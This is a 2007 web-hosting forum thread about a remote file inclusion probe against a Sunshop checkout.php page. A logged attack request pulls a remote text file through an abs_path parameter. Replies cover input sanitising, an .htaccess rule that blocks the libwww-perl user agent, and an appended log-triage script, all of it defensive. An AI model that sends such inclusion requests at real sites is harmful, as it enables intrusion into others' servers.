| Author |
Message |
dad7732 RavenNuke(tm) Development Team

Joined: Mar 18, 2007 Posts: 1191
|
Posted:
Tue Aug 07, 2007 9:35 am |
|
Been running Sentinel for a long time so I have to ask ... Is there some sort of Sentinel type protection application for a regular PHP type site, not Nuke?
I have a customer where we're running a site written in plain old PHP. The site uses Sunshop for ordering and there are several blank orders coming through. Looking at the logs there are several lines using the /checkout.php/ for example:
Code:
"GET /shop/checkout.php?abs_path=http://www.italiandirectory.com/cache/echo.txt? HTTP/1.1" 200 23661 "-" "libwww-perl/5.807"
I can't figure out the attempted exploit as there is nothing intrusive happening that I can see.
Posting this here as you guys have been VERY helpful with previous issues, etc.
Thanks, Jay |
|
|
|
 |
Captain_Computer Hangin' Around

Joined: May 30, 2004 Posts: 46
|
Posted:
Tue Aug 07, 2007 10:06 am |
|
Do a search on the forums for:
There are numerous posts indicating how to stop those types of attacks using your (dot)htaccess file.
As for having Sentinel type program working with other than Nuke sites, there isn't anything published. But I have managed to get Sentinel working with Subdreamer CMS and IPB forums on my local machine. |
|
|
|
 |
Gremmie Former Moderator in Good Standing

Joined: Apr 06, 2006 Posts: 2415 Location: Iowa, USA
|
Posted:
Tue Aug 07, 2007 11:10 am |
|
They are probably just wildly throwing things at your scripts, not knowing what type of software you have. That attack may be meant for another CMS for example.
Their user agent means they are using a Perl script to access your site, not a browser. The user agent can easily be spoofed however. You can use .htaccess to block those user agents, as discussed in other threads.
As far as using Sentinel on a non-Nuke PHP site, you could probably get it to work, but I would just ensure you are properly sanitizing all inputs. And turn register_globals off. |
|
|
|
 |
dad7732 RavenNuke(tm) Development Team

Joined: Mar 18, 2007 Posts: 1191
|
Posted:
Tue Aug 07, 2007 11:26 am |
|
Didn't think about the .htaccess but that makes sense, thanks for jogging the memory. The script seems to be innocuous but it's rather annoying to the customer because every time they try, it causes a blank order to be generated.
register_globals has to be ON for the time being, other sites need it on.
Will report back with success .. thanks all. |
|
|
|
 |
dad7732 RavenNuke(tm) Development Team

Joined: Mar 18, 2007 Posts: 1191
|
Posted:
Tue Aug 07, 2007 12:03 pm |
|
This one in the .htaccess file did the trick. Error_log loaded with "Denied by server configuration" in the last 1/2 hr.
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots
Thanks to all ..... Jay |
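Added example, not part of the thread and not code from any poster: a log triage script that flags requests passing a remote URL as a query parameter value (the `abs_path=http://...` shape in the first post), independent of the user agent, since the thread notes the agent string can be spoofed. The sample log lines, addresses and the `example.invalid` host are constructed placeholders; the user-agent pattern is the one from the .htaccess line above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
UA_RULE = re.compile(r'^libwww-perl*', re.IGNORECASE)  # pattern from the thread's SetEnvIfNoCase line

def url_valued_params(target):
    """Names of query parameters whose (percent-decoded) value is a remote URL."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [name for name, value in pairs if REMOTE_URL.match(value.strip())]

def triage(lines):
    """Flag requests that pass a URL as a parameter value, whatever the user agent says."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        params = url_valued_params(m['target'])
        if params:
            hits.append({
                'host': m['host'],
                'path': urlsplit(m['target']).path,
                'params': params,
                'status': int(m['status']),  # 200 = reached the script, 403 = denied
                'ua_rule_matches': bool(UA_RULE.match(m['agent'])),
            })
    return hits

# Constructed sample lines; addresses, timestamps and example.invalid are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Aug/2007:09:12:01 -0500] "GET /shop/checkout.php?abs_path=http://example.invalid/echo.txt? HTTP/1.1" 200 23661 "-" "libwww-perl/5.807"',
    '192.0.2.44 - - [07/Aug/2007:09:15:40 -0500] "GET /shop/checkout.php?abs_path=http%3A%2F%2Fexample.invalid%2Fecho.txt%3F HTTP/1.1" 200 23661 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [07/Aug/2007:09:20:03 -0500] "GET /shop/checkout.php?step=2&return=/shop/cart.php HTTP/1.1" 200 5120 "http://shop.example.invalid/shop/cart.php" "Mozilla/5.0"',
    '192.0.2.10 - - [07/Aug/2007:12:03:19 -0500] "GET /shop/checkout.php?abs_path=http://example.invalid/echo.txt? HTTP/1.1" 403 212 "-" "libwww-perl/5.807"',
]

if __name__ == '__main__':
    for hit in triage(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 and `ua_rule_matches` false is a request the user-agent deny rule would not have stopped. Parameters that legitimately carry URLs will also be flagged and need review by hand.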
|
|
|
 |
Gremmie Former Moderator in Good Standing

Joined: Apr 06, 2006 Posts: 2415 Location: Iowa, USA
|
Posted:
Tue Aug 07, 2007 6:12 pm |
|
|
|
 |
Captain_Computer Hangin' Around

Joined: May 30, 2004 Posts: 46
|
Posted:
Tue Aug 07, 2007 8:47 pm |
|
You're welcome. It is really refreshing that after a problem is solved that the person comes back and thanks the community. |
|
|
|
 |